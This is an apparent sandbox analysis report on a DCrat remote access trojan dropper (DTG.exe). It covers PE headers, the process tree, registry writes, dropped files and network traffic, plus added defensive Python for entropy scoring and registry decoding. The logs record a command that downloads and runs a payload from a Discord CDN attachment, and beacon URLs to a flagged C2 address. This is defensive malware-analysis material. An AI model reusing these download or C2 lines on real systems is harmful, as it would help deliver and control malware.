File name: | DTG.exe |
Full analysis: | https://app.any.run/tasks/eb0e4dd3-161c-447a-92bb-e215f1b861b2 |
Verdict: | Malicious activity |
Threats: | DCrat, also known as Dark Crystal RAT, is a remote access trojan (RAT), which was first introduced in 2018. It is a modular malware that can be customized to perform different tasks. For instance, it can steal passwords, crypto wallet information, hijack Telegram and Steam accounts, and more. Attackers may use a variety of methods to distribute DCrat, but phishing email campaigns are the most common. |
Analysis date: | November 29, 2020, 19:14:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (console) Intel 80386, for MS Windows |
MD5: | 2202DF2D04172620A865284C25468C40 |
SHA1: | 24514BDBB2745C465AD9C33B1D54283DB5491EEC |
SHA256: | 9C1933510DB0DBB9FF278BA0E636073BBFF613040BE71AE3CA3DF0194C946011 |
SSDEEP: | 6144:j5aWbksiNTBOmOBUfLXwNvkJqEeWFiUxmgsDj/vuWqzS8GI2RR:j5atNTAmOBSXwNkJTokmgsHHuWqO8D23 |
Extension | Detected file type (match %) |
---|---|
.exe | Win32 Executable MS Visual C++ (generic) (41) |
.exe | Win64 Executable (generic) (36.3) |
.dll | Win32 Dynamic Link Library (generic) (8.6) |
.exe | Win32 Executable (generic) (5.9) |
.exe | Win16/32 Executable Delphi generic (2.7) |
Field | Value |
---|---|
MachineType: | Intel 386 or later, and compatibles |
TimeStamp: | 2018:02:01 21:18:05+01:00 |
PEType: | PE32 |
LinkerVersion: | 2.5 |
CodeSize: | 70144 |
InitializedDataSize: | 285184 |
UninitializedDataSize: | - |
EntryPoint: | 0x1000 |
OSVersion: | 4 |
ImageVersion: | - |
SubsystemVersion: | 4 |
Subsystem: | Windows command line |

Field | Value |
---|---|
Architecture: | IMAGE_FILE_MACHINE_I386 |
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_CUI |
Compilation Date: | 01-Feb-2018 20:18:05 |
DOS header field | Value |
---|---|
Magic number: | MZ |
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000080 |

PE file header field | Value |
---|---|
Signature: | PE |
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 5 |
Time date stamp: | 01-Feb-2018 20:18:05 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: | |
Name | Virtual Address | Virtual Size | Raw Size | Characteristics | Entropy |
---|---|---|---|---|---|
.code | 0x00001000 | 0x0000387E | 0x00003A00 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 5.52797 |
.text | 0x00005000 | 0x0000D642 | 0x0000D800 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ | 6.54615 |
.rdata | 0x00013000 | 0x000033A8 | 0x00003400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.11033 |
.data | 0x00017000 | 0x0000178C | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 5.10093 |
.rsrc | 0x00019000 | 0x00041400 | 0x00041400 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ | 7.99849 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 4.92322 | 611 | Latin 1 / Western European | UNKNOWN | RT_MANIFEST |
37CC762889D89ED82B0F8082A787488D8B52E439 | 2.58496 | 6 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
8107AD4234DBDB426EEC4E3586EF4342434CDF41 | 5.64022 | 60 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
96BBCF029C0AF068638AFC587F789E0BE99E822F | 7.99928 | 265216 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
BB566DB6B3319380E8F5ADC2C374C570 | 3.23593 | 14 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
E17710310A95EDFDDFE85FA8E27B3996AE7CD060 | 6.84502 | 174 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
F2C9BF06DC | 0 | 1 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
F6FC11950B9994DF94408CA6FCCFB624 | 7.10232 | 240 | Latin 1 / Western European | UNKNOWN | RT_RCDATA |
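The DOS and PE header fields listed above are exactly what a parser follows to reach the section table: e_lfanew (shown as "Address of NE header", 0x80) locates the PE signature, the file header supplies the section count (5) and optional-header size (0xE0), and the 40-byte section headers follow immediately after the optional header. The per-section entropy column is the useful signal in these tables: .rsrc at 7.99849, holding a 265,216-byte RT_RCDATA resource at 7.99928, is as close to 8 bits per byte as data gets, which is the profile of a compressed or encrypted embedded payload rather than ordinary icons or dialogs. The following is an added example, not code from the report or the sandbox: a minimal Python walker that parses these headers and scores each section's entropy, run against a constructed two-section image (not DTG.exe) whose .rsrc is filled with pseudo-random bytes. The 7.5 threshold is this example's own choice.

```python
import math
import random
import struct

IMAGE_DOS_SIGNATURE = b"MZ"
IMAGE_NT_SIGNATURE = b"PE\0\0"
# Assumption of this example: sections at or above this entropy are treated as packed/encrypted.
HIGH_ENTROPY = 7.5


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or constant data, 8.0 for uniform random."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(image: bytes) -> dict:
    """Walk IMAGE_DOS_HEADER -> IMAGE_FILE_HEADER -> section table and score each section."""
    if image[:2] != IMAGE_DOS_SIGNATURE:
        raise ValueError("missing MZ signature")
    # e_lfanew at 0x3C is the offset of "PE\0\0" (the report's "Address of NE header", 0x80 for DTG.exe)
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != IMAGE_NT_SIGNATURE:
        raise ValueError("missing PE signature at e_lfanew")
    # IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    fh = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, fh)
    # The section table starts right after the optional header; each IMAGE_SECTION_HEADER is 40 bytes.
    first = fh + 20 + opt_size
    sections = []
    for i in range(nsections):
        off = first + i * 40
        name, vsize, vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, off)
        (chars,) = struct.unpack_from("<I", image, off + 36)   # Characteristics is the last field
        raw = image[raw_ptr:raw_ptr + raw_size]
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_address": vaddr,
            "virtual_size": vsize,
            "raw_size": raw_size,
            "characteristics": chars,
            "entropy": round(shannon_entropy(raw), 5),
        })
    return {"machine": machine, "timestamp": timestamp, "sections": sections}


def high_entropy_sections(report: dict, threshold: float = HIGH_ENTROPY) -> list:
    """Names of sections whose raw bytes look compressed or encrypted."""
    return [s["name"] for s in report["sections"] if s["entropy"] >= threshold]


def build_sample_image() -> bytes:
    """Constructed PE-shaped blob (headers plus two sections, not loadable): a repetitive
    .text and a pseudo-random .rsrc that mimics the report's 7.99 .rsrc entropy. Not DTG.exe."""
    rng = random.Random(1)
    text_raw = (b"\x55\x8b\xec" * 100).ljust(0x200, b"\x00")     # push ebp / mov ebp,esp, zero padded
    rsrc_raw = bytes(rng.getrandbits(8) for _ in range(0x1000))  # stands in for an encrypted resource
    e_lfanew, opt_size, text_ptr = 0x80, 0xE0, 0x400              # e_lfanew and optional size as in the report
    dos = bytearray(e_lfanew)
    dos[:2] = IMAGE_DOS_SIGNATURE
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine=I386, 2 sections, TimeDateStamp=2018-02-01 20:18:05 UTC (the report's compile time)
    file_header = struct.pack("<HHIIIHH", 0x14C, 2, 0x5A7375FD, 0, 0, opt_size, 0x0102)

    def section(name, vsize, vaddr, raw_size, raw_ptr, chars):
        return struct.pack("<8sIIIIIIHHI", name, vsize, vaddr, raw_size, raw_ptr, 0, 0, 0, 0, chars)

    table = (section(b".text", len(text_raw), 0x1000, len(text_raw), text_ptr, 0x60000020)
             + section(b".rsrc", len(rsrc_raw), 0x2000, len(rsrc_raw), text_ptr + len(text_raw), 0x40000040))
    img = bytearray(bytes(dos) + IMAGE_NT_SIGNATURE + file_header + bytes(opt_size) + table)
    img += bytes(text_ptr - len(img))                             # pad headers up to the first raw section
    return bytes(img + text_raw + rsrc_raw)


if __name__ == "__main__":
    rep = parse_sections(build_sample_image())
    for s in rep["sections"]:
        print(f"{s['name']:<8} VA=0x{s['virtual_address']:08X} raw={s['raw_size']:#x} entropy={s['entropy']}")
    print("high-entropy sections:", high_entropy_sections(rep))
```

Running the same walker over a real sample reproduces the report's section table; the entropy threshold is the only tunable, and in practice anything above about 7.2 in a section that is not .rsrc-with-images or a known packer section deserves a look at what unpacks it at runtime.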
Imported DLL |
---|
COMCTL32.DLL |
GDI32.DLL |
KERNEL32.dll |
MSVCRT.dll |
OLE32.DLL |
SHELL32.DLL |
SHLWAPI.DLL |
USER32.DLL |
WINMM.DLL |
PID | CMD | Path | Indicators | Parent process | Process details |
---|---|---|---|---|---|
2312 | "C:\Users\admin\AppData\Local\Temp\DTG.exe" | C:\Users\admin\AppData\Local\Temp\DTG.exe | | explorer.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
3928 | "C:\Windows\system32\cmd" /c "C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.bat C:\Users\admin\AppData\Local\Temp\DTG.exe" | C:\Windows\system32\cmd.exe | | DTG.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
1892 | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/781961547324063799/782685559528882216/file.exe" "file.exe" "" "" "" "" "" "" | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe | | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
376 | file.exe | C:\Users\admin\AppData\Local\Temp\18133\file.exe | | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
2028 | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe "" "" "" "" "" "" "" "" "" | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\extd.exe | — | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
2084 | "C:\Windows\System32\WScript.exe" "C:\fontwin\kvJ4bXdZaMAubDuToPWQkvZAJ3aT3u.vbe" | C:\Windows\System32\WScript.exe | — | file.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1760 | cmd /c ""C:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
2512 | ZBBZyltbXV8x7QWBSaxb.exe -p05dfc7f67816f98eb3a762f823599b3a58c6c582 | C:\fontwin\ZBBZyltbXV8x7QWBSaxb.exe | | cmd.exe | User: admin; Integrity Level: MEDIUM; Exit code: 0 |
732 | "C:\Windows\System32\WScript.exe" "C:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbe" | C:\Windows\System32\WScript.exe | — | ZBBZyltbXV8x7QWBSaxb.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft ® Windows Based Script Host; Exit code: 0; Version: 5.8.7600.16385 |
1108 | cmd /c ""C:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.bat" " | C:\Windows\System32\cmd.exe | — | WScript.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Operation | Key | Name | Value |
---|---|---|---|---|---|
376 | file.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
376 | file.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1 |
2084 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
2084 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1 |
2512 | ZBBZyltbXV8x7QWBSaxb.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
2512 | ZBBZyltbXV8x7QWBSaxb.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1 |
732 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | UNCAsIntranet | 0 |
732 | WScript.exe | write | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | AutoDetect | 1 |
956 | intomonitor.exe | write | HKEY_CURRENT_USER\Software\85ea072a9e5a5bbfb99441627ffd39601d90bbdd | 0107c07d5c5a9e83a2c81dca62131af7ba08ed5b | PCQ+QzpcUHJvZ3JhbURhdGFcQXBwbGljYXRpb24gRGF0YVxzbXNzLmV4ZTwkPkM6XGZvbnR3aW5cY3Nyc3MuZXhlPCQ+QzpcVXNlcnNcYWRtaW5cRG9jdW1lbnRzXE15IE11c2ljXElNRURJQ1RVUERBVEUuZXhl |
1004 | IMEDICTUPDATE.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\IMEDICTUPDATE_RASAPI32 | EnableFileTracing | 0 |
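The ZoneMap writes are incidental (the Internet Settings zone map is touched by any WinINet/URLMon consumer), but the value that intomonitor.exe (PID 956) writes under HKCU\Software\85ea072a9e5a5bbfb99441627ffd39601d90bbdd is worth decoding: it is base64, and the plaintext is a list of three executable paths separated by the literal token `<$>`. Two of the paths borrow the names of core Windows processes (smss.exe, csrss.exe) in directories where the genuine binaries never live, and the third, IMEDICTUPDATE.exe under the user's Documents folder, matches the image name of the process (PID 1004) that later beacons to 212.109.216.114 in the network tables below. The following is an added example, not part of the report: a Python decoder for this value that also flags the masquerading names. The set of system process names and the system-directory prefixes are the example's own assumptions, not data from the report.

```python
import base64
import ntpath  # Windows path semantics regardless of the host OS

# Value written by intomonitor.exe (PID 956) under
# HKCU\Software\85ea072a9e5a5bbfb99441627ffd39601d90bbdd, copied verbatim from the report.
REPORT_VALUE = (
    "PCQ+QzpcUHJvZ3JhbURhdGFcQXBwbGljYXRpb24gRGF0YVxzbXNzLmV4ZTwkPkM6XGZvbnR3aW5cY3Nyc3MuZXhl"
    "PCQ+QzpcVXNlcnNcYWRtaW5cRG9jdW1lbnRzXE15IE11c2ljXElNRURJQ1RVUERBVEUuZXhl"
)
DELIMITER = "<$>"

# Core Windows process names whose genuine binaries live only in %SystemRoot%\System32
# (or SysWOW64 on 64-bit). Hand-picked for this example, not exhaustive.
SYSTEM_PROCESS_NAMES = {"smss.exe", "csrss.exe", "wininit.exe", "winlogon.exe",
                        "services.exe", "lsass.exe", "svchost.exe"}
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")


def decode_path_list(value: str) -> list:
    """Strictly base64-decode the value and split on the "<$>" delimiter, dropping empties
    (the report's value starts with a delimiter, so the first element is empty)."""
    raw = base64.b64decode(value, validate=True)
    return [p for p in raw.decode("utf-8").split(DELIMITER) if p]


def masquerading(paths) -> list:
    """Paths that borrow a core Windows process name but sit outside the system directories."""
    hits = []
    for p in paths:
        directory, filename = ntpath.split(p)
        if filename.lower() in SYSTEM_PROCESS_NAMES and not directory.lower().startswith(SYSTEM_DIRS):
            hits.append(p)
    return hits


def analyse(value: str) -> dict:
    """Decode the value and group the paths by what makes them suspicious."""
    paths = decode_path_list(value)
    return {
        "paths": paths,
        "masquerading": masquerading(paths),
        # Assumption: anything outside C:\Windows is writable by the medium-integrity user seen in the report
        "user_writable": [p for p in paths if not p.lower().startswith(r"c:\windows")],
    }


if __name__ == "__main__":
    result = analyse(REPORT_VALUE)
    for label, items in result.items():
        print(label)
        for p in items:
            print("   ", p)
```

The decoded paths are the artefacts to sweep for on other hosts; the registry key and value names are SHA-1-length hex strings and differ per build, so hunting on the key name is far less useful than hunting on the `<$>`-delimited, base64-encoded path list under HKCU\Software.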
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
3928 | cmd.exe | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\777D.tmp | — | — | — |
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\N4epcgQecAnjyygw8SG45FKiobRBj4.vbe | vbe | F17F0E353FF2E0748C45D184FCEF0F6D | 39A04084B03EED5307597DB5CA334E120D65E30753B26B6B04B2125F2E183D7F |
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\uuvtFWrWhfSvv75Tqpu9K4c9X9ZOi7.bat | text | F53F2D3486BCADFEBF99B50787D63EF8 | B280C295172C0BF15D05D01E68177D89780B3C16B6C1FB54BA137DE6E084426F |
2312 | DTG.exe | C:\Users\admin\AppData\Local\Temp\776A.tmp\776B.tmp\776C.bat | text | 71E858EEF1A50FBB9EDCD47FAAD181A2 | 37BDCDA9090CDBA6C74B870121D1764BC2355B0DE8DF5BEE8E8998287084B948 |
376 | file.exe | C:\fontwin\S6zcPlhbe4N8j5sbAT8oa6BArAd5HN.bat | text | 9E93AC61E632B5701EDCE91203A1D3B1 | D0BDB40BE60214CEAFE39813BB98FA729887CA5BC23D966DEAC3F33C6CEA36AA |
1892 | extd.exe | C:\Users\admin\AppData\Local\Temp\file.exe | executable | 78843008C87987BA38BDC904B2D0AA6B | A3768890FC31193053B505A954378E3C936F257D8ECB86F47037CBA861B81969 |
956 | intomonitor.exe | C:\ProgramData\69ddcba757bf72f7d36c464c71f42baab150b2b9 | text | 1F0B918E693269B3FF4C2745BA1D6515 | 1488D24D2740ACD5070A6C05FBDCEC751F47B9FD0C36ED755070CDB97441E911 |
956 | intomonitor.exe | C:\fontwin\886983d96e3d3e31032c679b2d4ea91b6c05afef | text | 9E2A65D4ED11D45BE5069F45C71A9064 | 6879613416461C05A7E53DD678CD51B3E15D3EB8BB7F846837BDAB951B8B3FF0 |
2512 | ZBBZyltbXV8x7QWBSaxb.exe | C:\fontwin\intomonitor.exe | executable | CF169BD95835AE629C02622DAAC7A047 | 5F452C934A5C0E7558FE7F0592E93E2A21A7DEE08E3A334AC98502C5E1A082E7 |
376 | file.exe | C:\fontwin\ZBBZyltbXV8x7QWBSaxb.exe | executable | 2AD38CA67FC0883303D9FC98F6939EF5 | 87E96FDFD3674E5487425A6169CBC11613F8E3B2C5AEBDF7BCFFCE8ABF61D2A5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 151.139.128.14:80 | http://ocsp.comodoca4.com/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTOpjOEf6LG1z52jqAxwDlTxoaOCgQUQAlhZ%2FC8g3FP3hIILG%2FU1Ct2PZYCEQD5g7jF84adhvw3B5kCUueb | US | der | 280 b | whitelisted |
— | — | GET | 200 | 151.139.128.14:80 | http://ocsp.comodoca4.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrJdiQ%2Ficg9B19asFe73bPYs%2BreAQUdXGnGUgZvJ2d6kFH35TESHeZ03kCEFslzmkHxCZVZtM5DJmpVK0%3D | US | der | 313 b | whitelisted |
— | — | GET | 200 | 151.139.128.14:80 | http://crl.comodoca.com/AAACertificateServices.crl | US | der | 506 b | whitelisted |
1004 | IMEDICTUPDATE.exe | GET | 200 | 212.109.216.114:80 | http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&8e9835d38dff946e24408bfe4ab24496=d3981f3ee160cf75a0df452d812fb5e4&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH | RU | text | 71 b | malicious |
1004 | IMEDICTUPDATE.exe | GET | 200 | 212.109.216.114:80 | http://212.109.216.114/wmu7nzj48bdc5sfsivxxqwbhwvytre7ez/ramh92gnmgzspukfiow6z3w4k0syktrjibaovdmcgqze53rv3d1h85hs16t5jnjdcbefq1qi76n4poo8cf/dcbb3f0abca3117648fdcab13b68e1162ddbc275.php?Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH&b5734a889a7eac7932861e019fed7999=2c673e0ac932abf7a843ea57933688a6&ca43f36379411f81492585e899d11eea=afbddd404b6e908834ec01647b97c946c53a6d64&Kq36btx1WBwjA0sZm=l7eyICnkoavU&SxmTY3EYVTN=w0LdP7C2dDqAWh1S1EX&Csdw=hTgi7PnQNWLbH | RU | text | 150 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1004 | IMEDICTUPDATE.exe | 212.109.216.114:80 | — | JSC ISPsystem | RU | malicious |
1892 | extd.exe | 162.159.134.233:443 | cdn.discordapp.com | Cloudflare Inc | — | shared |
— | — | 151.139.128.14:80 | crl.comodoca.com | Highwinds Network Group, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
cdn.discordapp.com | | shared |
crl.comodoca.com | | whitelisted |
ocsp.comodoca4.com | | whitelisted |